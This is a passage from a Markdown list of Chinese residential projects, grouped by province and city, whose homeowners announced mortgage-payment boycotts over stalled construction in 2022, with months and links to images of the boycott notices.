[ไธ–่Œ‚ๆณฐ็ฆพๅ—ๆ˜Œ้™ขๅญ](images/ๆฑŸ่ฅฟ็œ/ๅ—ๆ˜Œๅธ‚/_ไธ–่Œ‚ๆณฐ็ฆพๅ—ๆ˜Œ้™ขๅญ), ๆ–ฐๅŠ›ๅŸŽ, ไธญ้‡‘ไธญๅฟƒ - **่ไนกๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๅพกๅบœไบŒๆœŸ, ๅบ„ๅ’ŒไธญๅคฎๅŽๅบœ๏ผˆ10ๆœˆ๏ผ‰ - **ๆ–ฐไฝ™ๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ๏ผˆ9ๆœˆ๏ผ‰ - **ๅฎœๆ˜ฅๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ปฟๆดฒๅ››ๆœŸ ### ่พฝๅฎ็œ [ 9 ] - **ๅคง่ฟžๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๅคง่ฟžๅธ‚้‘ซๅˆ›็ง‘ๆŠ€ๅฅๅบทๅฐ้•‡๏ผˆๅŒ…ๆ‹ฌ้‘ซ่‹‘่—้พ™้ฆ–ไป˜ไธ€ๆœŸใ€ไบŒๆœŸ๏ผ‰](images/่พฝๅฎ็œ/ๅคง่ฟžๅธ‚/ๅคง่ฟž้‘ซ่‹‘.jpg), [่žๅˆ›ๆตท้€ธ้•ฟๆดฒ](images/่พฝๅฎ็œ/ๅคง่ฟžๅธ‚/ๅคง่ฟž่žๅˆ›ๆตท้€ธ้•ฟๆดฒ.jpg), ้ฆ™ๆตทๆปจๅŸŽไบŒๆœŸ - **ๆฒˆ้˜ณๅธ‚๏ผˆ6๏ผ‰๏ผš** [ๆ’ๅคง็››ไบฌ็บๅบญ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคง็››ไบฌ็บๅบญ.png), ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ, [ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคง่ฅฟๆฑŸๅคฉๆ‚ฆ, [ๆ’ๅคงไธญๅคฎๅนฟๅœบ](images/่พฝๅฎ็œ/ๆฒˆ้˜ณๅธ‚/ๆฒˆ้˜ณๆ’ๅคงไธญๅคฎๅนฟๅœบ.jpg), ้‡‘็ง‘้›†็พŽไธœๆ–น ### ๅ†…่’™ๅค่‡ชๆฒปๅŒบ [ 1 ] - **ๅ‘ผๅ’Œๆตฉ็‰นๅธ‚๏ผˆ1๏ผ‰๏ผš** ้ฆ™ๅข…ๅฒญ่ฅฟๅŒบ๏ผˆ10ๆœˆ๏ผ‰ ### ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ [ 1 ] - **้“ถๅทๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็บ็ฟๅบœ](images/ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ/้“ถๅทๅธ‚/้“ถๅทๅธ‚ๆ’ๅคง็บ็ฟๅบœ.png) ### ๅฑฑไธœ็œ [ 14 ] - **ๆตŽๅ—ๅธ‚๏ผˆ2๏ผ‰๏ผš** [่žๅˆ›ไธญๆ–ฐๅ›ฝ้™…ๅŸŽๅ››ๆœŸๅ—ๅŒบ](images/ๅฑฑไธœ็œ/ๆตŽๅ—ๅธ‚/่žๅˆ›ไธญๆ–ฐๅ›ฝ้™…ๅŸŽๅ››ๆœŸๅ—ๅŒบ.jpeg), [้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ](images/ๅฑฑไธœ็œ/ๆตŽๅ—ๅธ‚/้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ.jpeg) - **้’ๅฒ›ๅธ‚๏ผˆ10๏ผ‰๏ผš** [้ป„ๅฒ›่“ๅ…‰้›้”ฆๅŠๅฒ›๏ผˆ6ๆœˆ)](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/่“ๅ…‰้›้”ฆๅŠๅฒ›.jpeg), [่ƒถๅทžๅไฟกๅคฉ้ช„ไบ‘้บ“](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/่ƒถๅทžๅไฟกๅคฉ้ช„ไบ‘้บ“.jpeg), [ๆŽๆฒงๅŒบ่žๅˆ›ๆ‚ฆๅฑฑไบŒๆœŸ](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๆŽๆฒงๅŒบ่žๅˆ›ๆ‚ฆๅฑฑไบŒๆœŸ.jpg), [็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™.png), [้’ๅฒ›ๆตทๆด‹ๆดปๅŠ›ๅŒบ่žๅˆ›ไธญๅฟƒไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/้’ๅฒ›ๆตทๆด‹ๆดปๅŠ›ๅŒบ่žๅˆ›ไธญๅฟƒไธ‰ๆœŸ.png), [ไธ‰็››ๅ›ฝ้™…ๆตทๅฒธไบ”ๆœŸ๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ไธ‰็››ๅ›ฝ้™….jpeg), [ๅฎžๅœฐ่”ท่–‡ๅ›ฝ้™…](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๅฎžๅœฐ่”ท่–‡ๅ›ฝ้™….jpeg), [่ฅฟๆตทๅฒธๆ–ฐๅŒบ่žๅˆ›ๅฝฑ้ƒฝๅญฆๅบœไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/้’ๅฒ›่ฅฟๆตทๅฒธๆ–ฐๅŒบ่žๅˆ›ๅฝฑ้ƒฝๅญฆๅบœไธ‰ๆœŸ.jpeg), [่ฅฟๆตทๅฒธๆ–ฐๅŒบไธ–่Œ‚โ€ข้ฆ™ๅฅˆๅ…ฌ้ฆ†๏ผˆ10ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/_่ฅฟๆตทๅฒธๆ–ฐๅŒบไธ–่Œ‚โ€ข้ฆ™ๅฅˆๅ…ฌ้ฆ†), [ไธญๅ—ๆž—ๆจพๅฐๅŒบ๏ผˆ7ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/้’ๅฒ›ๅธ‚/ๆŽๆฒงไธญๅ—ๆž—ๆจพ.jpg) - **็ƒŸๅฐๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆพ้šฝ้˜ณๅ…‰ๅŸŽ๏ผˆ12ๆœˆ๏ผ‰](images/ๅฑฑไธœ็œ/็ƒŸๅฐๅธ‚/ๆพ้šฝ้˜ณๅ…‰ๅŸŽ.jpeg) - **ๆท„ๅšๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคงๅ…ป็”Ÿ่ฐท](images/ๅฑฑไธœ็œ/ๆท„ๅšๅธ‚/_ๆท„ๅšๆ’ๅคงๅ…ป็”Ÿ่ฐท) ### ๅฑฑ่ฅฟ็œ [ 11 ] - **ๅคชๅŽŸๅธ‚๏ผˆ11๏ผ‰๏ผš** ๅฎ่ƒฝๅŸŽไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰, [ๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšๅƒ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ๅ…ซๆœŸ๏ผˆ10ๆœˆ๏ผ‰, ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ไบ”ๆœŸ๏ผˆๅ…ซๆœˆ๏ผ‰, [ๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [็ปฟๅœฐๆ–ฐ้‡ŒๅŸŽไบŒๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸ็ปฟๅœฐๆ–ฐ้‡Œ็จ‹.jpg), [ๅคชๅŽŸๅฏŒๅŠ›ๅคฉ็ฆงๅŸŽ3ๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๅธ‚ๅฏŒๅŠ›ๅคฉ็ฆงๅŸŽ3ๆœŸ.jpg), [ๅคชๅŽŸๅธ‚ๆ’ๅคงๅพกๆ™ฏๆนพ4ๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๅธ‚ๆ’ๅคงๅพกๆ™ฏๆนพ4ๆœŸ.jpg), [ๅคชๅŽŸๅธ‚่žๅˆ›ไธญๅฟƒ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/ๅคชๅŽŸๅธ‚่žๅˆ›ไธญๅฟƒ.png), ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ, [่ฟœๆด‹็บขๆ˜Ÿๅคฉๆถฆไธ€ๆœŸ](images/ๅฑฑ่ฅฟ็œ/ๅคชๅŽŸๅธ‚/_่ฟœๆด‹็บขๆ˜Ÿๅคฉๆถฆไธ€ๆœŸ) ### ้™•่ฅฟ็œ [ 24 ] - **่ฅฟๅฎ‰ๅธ‚๏ผˆ23๏ผ‰๏ผš** [ๅฝ“ไปฃๅ˜‰ๅฎๅ…ฌๅ›ญๆ‚ฆ](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/ๅฝ“ไปฃๅ˜‰ๅฎๅ…ฌๅ›ญๆ‚ฆๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ๅพทๆฐ็Šถๅ…ƒๅบœ้‚ธ๏ผˆ9ๆœˆ๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅธ‚_ๅพทๆฐ็Šถๅ…ƒๅบœ้‚ธไบŒๆœŸ.jpg), [ๅ›ฝ้™…ๆธฏๅŠกๅŒบ็ปฟๅœฐๅ›ฝๆธฏๆ–ฐ้‡ŒๅŸŽไธ€ๆœŸ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅ›ฝ้™…ๆธฏๅŠกๅŒบ็ปฟๅœฐๅ›ฝๆธฏๆ–ฐ้‡ŒๅŸŽไธ€ๆœŸไธšไธป้›†ไฝ“ๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๅ›ฝ้™…ๅนธ็ฆๅŸŽ, ้„ ้‚‘ๅŒบๅไป•ๅŽๅบญ, [้”ฆไธš6ๅทๅบœ้‚ธ](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰้”ฆไธš6ๅทๅบœ้‚ธๅœ่ดท้€š็Ÿฅไนฆ.png), ไนๅŽๅŸŽ้ฆ™ๆฆญๅบ„ๅ›ญ, [็ปฟๅœฐ็’€็’จๅคฉๅŸŽไบŒๆœŸ](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅ›ฝ้™…ๆธฏๅŠกๅŒบ็ปฟๅœฐ็’€็’จๅคฉๅŸŽBๅœฐๅ—ไธšไธป้›†ไฝ“ๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [็ปฟๅœฐๆ–ฐ้‡Œ็จ‹ไธ‰ๆœŸๅ…ฐไบญๅ…ฌ้ฆ†](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰็ปฟๅœฐๅ…ฐไบญๅ…ฌ้ฆ†ๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [่žๅˆ›ไธœๆ–นๅฎธ้™ขDK5](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅธ‚ๆ–ฐๅŸŽๅŒบ่žๅˆ›ไธœๆ–นๅฎธ้™ขDK5ๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [ไธ–่Œ‚็’€็’จๅ€พๅŸŽไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/_ไธ–่Œ‚็’€็’จๅ€พๅŸŽไบŒๆœŸ), [ไธ‡ๅ’Œ้ƒก](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ไธ‡ๅ’Œ้ƒกๅœ่ดทๅ‘Š็Ÿฅ.png), [่ฅฟๅฎ‰็žๆกฅๅŒบๆ˜“ๅˆๅŠ๏ผˆ็›ธๅ…ณๆŠฅ้“๏ผ‰](https://new.qq.com/omn/20220322/20220322A02T2500.html), [่ฅฟๅฎ‰ๅฝ“ไปฃๅขƒMOMA](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅฝ“ไปฃๅขƒMOMA้กน็›ฎ้ข„ๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [่ฅฟๅฎ‰ๆฒฃไธœๆ–ฐๅŸŽๅ›ๅˆๅคฉ็Žบ](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๆฒฃไธœๆ–ฐๅŸŽๅ›ๅˆๅคฉ็Žบ.jpeg), [่ฅฟๅฎ‰ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [่ฅฟๅฎ‰ๅบทๆกฅๆ‚ฆ่“‰ๅ›ญ๏ผˆ9๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅบทๆกฅๆ‚ฆ่“‰ๅ›ญ13ๅทๆฅผๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.png), [่ฅฟๅฎ‰ๅไบฌ้™ขๆœ›](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅไบฌ้™ขๆœ›ๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), ่ฅฟๅฎ‰้“ญ้ธฟไธญๅฟƒไบŒๆœŸ, [่ฅฟๅฎ‰่ฟœๆด‹ๅˆ่ƒฝๆžซไธนๅ”ๆ‚ฆไบŒๆœŸ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰่ฟœๆด‹ๅˆ่ƒฝๆžซไธนๅ”ๆ‚ฆไบŒๆœŸๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ้˜ณๅ…‰100้˜ฟๅฐ”ๅ‹’๏ผˆ8ๆœˆ๏ผ‰, [ๆญฃ่ฃ็ดซ้˜™ๅณฏ่‘—๏ผˆ็ดซ้˜™ๅฐไธœ่ฅฟๅŒบ๏ผ‰](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๆญฃ่ฃ็ดซ้˜™ๅณฏ่‘—ๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ไธญๅ—ไธŠๆ‚ฆๅŸŽๅ››ๆœŸ](images/้™•่ฅฟ็œ/่ฅฟๅฎ‰ๅธ‚/่ฅฟๅฎ‰ๅธ‚่ฅฟๅ’ธๆ–ฐๅŒบไธญๅ—ไธŠๆ‚ฆๅŸŽๅ››ๆœŸๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅปถๅฎ‰ๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅปถๅฎ‰่žๅˆ›ๅฎธ้™ข](images/้™•่ฅฟ็œ/ๅปถๅฎ‰ๅธ‚/_ๅปถๅฎ‰่žๅˆ›ๅฎธ้™ข) ### ไธŠๆตทๅธ‚ [ 7 ] - **ๅด‡ๆ˜ŽๅŒบ๏ผˆ1๏ผ‰๏ผš** [ๅด‡ๆ˜Ž้•ฟๅ…ดๅฒ›ๆณฐ็ฆพๅคงๅŸŽๅฐ้™ข](images/ไธŠๆตทๅธ‚/ๅด‡ๆ˜ŽๅŒบ/ๆณฐ็ฆพๅคงๅŸŽๅฐ้™ข.png) - **ๅฅ‰่ดคๅŒบ๏ผˆ1๏ผ‰๏ผš** [ไธŠๆตทๅธ‚ๅฅ‰่ดคๅŒบๆณฐ็ฆพๆตทไธŠ้™ขๅญ](images/ไธŠๆตทๅธ‚/ๅฅ‰่ดคๅŒบ/ไธŠๆตทๅธ‚ๅฅ‰่ดคๅŒบๆณฐ็ฆพๆตทไธŠ้™ขๅญ.jpg) - **ๅ˜‰ๅฎšๅŒบ๏ผˆ2๏ผ‰๏ผš** [ๅ˜‰ๅฎšๅ—็ฟ”็ปฟ่ŒตๅŸŽๅธ‚ๅนฟๅœบ](images/ไธŠๆตทๅธ‚/ๅ˜‰ๅฎšๅŒบ/ๅ˜‰ๅฎš็ปฟ่ŒตๅŸŽๅธ‚ๅนฟๅœบ.png), [ๅพ่กŒไฝณๅ…†ไธšไบ”ๆœŸ](images/ไธŠๆตทๅธ‚/ๅ˜‰ๅฎšๅŒบ/ไธŠๆตทๅพ่กŒไฝณๅ…†ไธšไบ”ๆœŸ.jpeg) - **ๆตฆไธœๆ–ฐๅŒบ๏ผˆ3๏ผ‰๏ผš** [ไธดๆธฏไธ‡็ฅฅ้ขๆ™ฏๅ›ญๆฑŸๅ—้™ข](images/ไธŠๆตทๅธ‚/ๆตฆไธœๆ–ฐๅŒบ/ไธŠๆตทไธดๆธฏไธ‡็ฅฅ้ขๆ™ฏๅ›ญๆฑŸๅ—้™ข.jpeg), [ไธŠๆตทๆตฆไธœๆ–ฐๅŒบๅ›ๅพกๅ…ฌ้ฆ†](images/ไธŠๆตทๅธ‚/ๆตฆไธœๆ–ฐๅŒบ/ไธŠๆตทๆตฆไธœๆ–ฐๅŒบๅ›ๅพกๅ…ฌ้ฆ†ๅœ่ดท้€š็Ÿฅไนฆ.png), [ๅ‘จๆตฆๅˆๅฏŒๅนฟๅœบ](images/ไธŠๆตทๅธ‚/ๆตฆไธœๆ–ฐๅŒบ/ๅˆๅฏŒๅนฟๅœบๅœ่ดท้€š็Ÿฅ.png) ### ๅ››ๅท็œ [ 18 ] - **ๅทดไธญๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆฉ้˜ณๅทๆ—…ไธ–็บชๅค–ๆปฉ - **ๆˆ้ƒฝๅธ‚๏ผˆ9๏ผ‰๏ผš** [ๆ’ๅคงๆž—ๆบช้ƒก๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/hdlxj.jpg), [ๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๆ–ฐๆดฅๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ.jpg), [ๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ๏ผˆ7ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๅธ‚ๆธฉๆฑŸๅŒบๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ.jpg), [ไธ‰็››็ฟกไฟชๅฑฑ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ssfls.jpg), [ไธ‡้”ฆ็†™ๅฒธ2ๆœŸ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/wjxa2.png), [ๆญฆไพฏๆ–ฐๅŸŽๅฝ“ไปฃ็’ž่ช‰๏ผˆ7ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/whxcdd.jpg), [ๆ–ฐๅฐšๅฐš้™ข๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝๆธฉๆฑŸๅŒบๆ–ฐๅฐšๅฐš้™ขๅ‘Š็Ÿฅไนฆ.png), [้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ](images/ๅ››ๅท็œ/ๆˆ้ƒฝๅธ‚/ๆˆ้ƒฝ้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ.jpeg), ็ฝฎไฟก้€ธ้ƒฝๅŸŽ๏ผˆ9ๆœˆ๏ผ‰ - **ๅพท้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ](images/ๅ››ๅท็œ/ๅพท้˜ณๅธ‚/ๅ››ๅทๅพท้˜ณๆ’ๅคง็ฟก็ฟ ๅŽๅบญ.jpg) - **้ƒฝๆฑŸๅ ฐๅธ‚๏ผˆ1๏ผ‰๏ผš** [่žๅˆ›ๆ–‡ๆ—…ๆปจๆฑŸๆ–ฐๅŒบ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/้ƒฝๆฑŸๅ ฐๅธ‚/้ƒฝๆฑŸๅ ฐๅธ‚่žๅˆ›ๆ–‡ๆ—…ๆปจๆฑŸๆ–ฐๅŒบๅ…จไฝ“ไธšไธปๅ†ณๅฎš2022ๅนด8ๆœˆ30ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg) - **ๅนฟๅฎ‰ๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅธ่ฐทๅ…ฌๅ›ญๅŸŽไธ‰ๆœŸ - **ๆณธๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๆนพ - **็œ‰ๅฑฑๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/็œ‰ๅฑฑๅธ‚/็œ‰ๅฑฑๅธ‚ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ3-14ๅœฐๅ—ๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ.png), [็œ‰ๅฑฑๅธ‚ๅฝญๅฑฑๅŒบ่žๅˆ›ๆฐด้ƒกๆœชๆฅๅŸŽ๏ผˆๆฑŸๅฃๆฐด้•‡๏ผ‰๏ผˆ10ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/็œ‰ๅฑฑๅธ‚/็œ‰ๅฑฑๅธ‚ๅฝญๅฑฑๅŒบ่žๅˆ›ๆฐด้ƒกๆœชๆฅๅŸŽใ€ๆฑŸๅฃๆฐด้•‡ๅ…จไฝ“ไธšไธปๅ†ณๅฎšๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅ—ๅ……ๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๅ—ๅ……ๅคงๅˆๅŽๅบœ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๅ—ๅ……ๅธ‚/ๅ—ๅ……ๅคงๅˆๅŽๅบœ.png), [ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ๏ผˆ8ๆœˆ๏ผ‰](images/ๅ››ๅท็œ/ๅ—ๅ……ๅธ‚/ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ.png) ### ๅคฉๆดฅๅธ‚ [ 9 ] - **ๅฎๅปๅŒบ๏ผˆ1๏ผ‰๏ผš** [ๅฎๅปๅŒบๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ](images/ๅคฉๆดฅๅธ‚/ๅฎๅปๅŒบ/ๅคฉๆดฅๅธ‚ๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ.jpeg) - **ๅŒ—่พฐๅŒบ๏ผˆ2๏ผ‰๏ผš** [่žๅˆ›ๆดฅๅฎธๅฃนๅท](images/ๅคฉๆดฅๅธ‚/ๅŒ—่พฐๅŒบ/ๅคฉๆดฅๅธ‚ๆดฅๅฎธๅฃนๅทๅ…จไฝ“ไธšไธปโ€œๅŠจๆ€่ฟ˜่ดทโ€ๅ‘Š็Ÿฅไนฆ.png), [่žๅˆ›ๅพกๆ™ฏๅฎธ้™ข](images/ๅคฉๆดฅๅธ‚/ๅŒ—่พฐๅŒบ/ๅคฉๆดฅๅธ‚ๅŒ—่พฐๅŒบ่žๅˆ›ๅพกๆ™ฏๅฎธ้™ขๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆดฅๅ—ๅŒบ๏ผˆ1๏ผ‰๏ผš** ๅ››ๅญฃๆ˜ฅๆ™“ - **ๅคฉๆดฅๅŸŽๅŒบ๏ผˆ4๏ผ‰๏ผš** [่žๅˆ›ๅ—ๅผ€ๅฎธ้™ขไบŒๆœŸ](images/ๅคฉๆดฅๅธ‚/ๅคฉๆดฅๅŸŽๅŒบ/ๅคฉๆดฅ่žๅˆ›ๅ—ๅผ€ๅฎธ้™ขไบŒๆœŸไฝๅฎ…ๅ…จไฝ“ไธšไธปๅŠจๆ€่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.jpg), ๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ๏ผˆ8ๆœˆ๏ผ‰, ๅฎžๅœฐ่”ท่–‡๏ผˆ9ๆœˆ๏ผ‰, [ๅคฉๆดฅๅคฉๆˆฟๆจพๆข…ๆฑŸไฝๅฎ…](images/ๅคฉๆดฅๅธ‚/ๅคฉๆดฅๅŸŽๅŒบ/_ๅคฉๆดฅๅคฉๆˆฟๆจพๆข…ๆฑŸไฝๅฎ…) - **ๆญฆๆธ…ๅŒบ๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๆนพ๏ผˆ10ๆœˆ๏ผ‰ ### ไบ‘ๅ—็œ [ 8 ] - **ๅคง็†็™ฝๆ—่‡ชๆฒปๅทž๏ผˆ1๏ผ‰๏ผš** [ๅคง็†็š„ๅฐ้™ขๅญๅŒ—ๅŒบ๏ผˆ12ๆœˆ๏ผ‰](images/ไบ‘ๅ—็œ/ๅคง็†็™ฝๆ—่‡ชๆฒปๅทž/_ๅคง็†็š„ๅฐ้™ขๅญๅŒ—ๅŒบ) - **ๆ˜†ๆ˜Žๅธ‚๏ผˆ6๏ผ‰๏ผš** ๆ’ๅคงๅŸŽ๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง็Ž–็‘ๆนพ๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง้˜ณๅ…‰ๅŠๅฒ›๏ผˆ9ๆœˆ๏ผ‰, ไฝณๅ…†ไธšๅŸŽๅธ‚ๅนฟๅœบ๏ผˆ9ๆœˆ๏ผ‰, ่“ๅ…‰ๅพทๅ•†ๅคฉๅŸŸ๏ผˆ8ๆœˆ๏ผ‰, ๅฎžๅœฐ่Šฑ้นค็ฟŽ๏ผˆ10ๆœˆ๏ผ‰ - **็Ž‰ๆบชๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆจฑ่Šฑ่ฐท๏ผˆ7ๆœˆ๏ผ‰ ### ๆต™ๆฑŸ็œ [ 6 ] - **ๆญๅทžๅธ‚๏ผˆ4๏ผ‰๏ผš** [ๅฏŒ้˜ณๅŒบๆณฐ็ฆพๅคงๅŸŽๅฐ้™ขๆฅผ็›˜](images/ๆต™ๆฑŸ็œ/ๆญๅทžๅธ‚/ๆต™ๆฑŸ็œๆญๅทžๅธ‚ๅฏŒ้˜ณๅŒบๆณฐ็ฆพๅคงๅŸŽๅฐ้™ขๆฅผ็›˜ๅฏŒๆ”ฟๅ‚จๅ‡บ๏ผˆ2010๏ผ‰20ๅทๅœฐๅ—่ดญๆˆฟ่€…ๆš‚ๅœ่ฟ˜่ดงๅ‘Š็Ÿฅไนฆ.jpg), 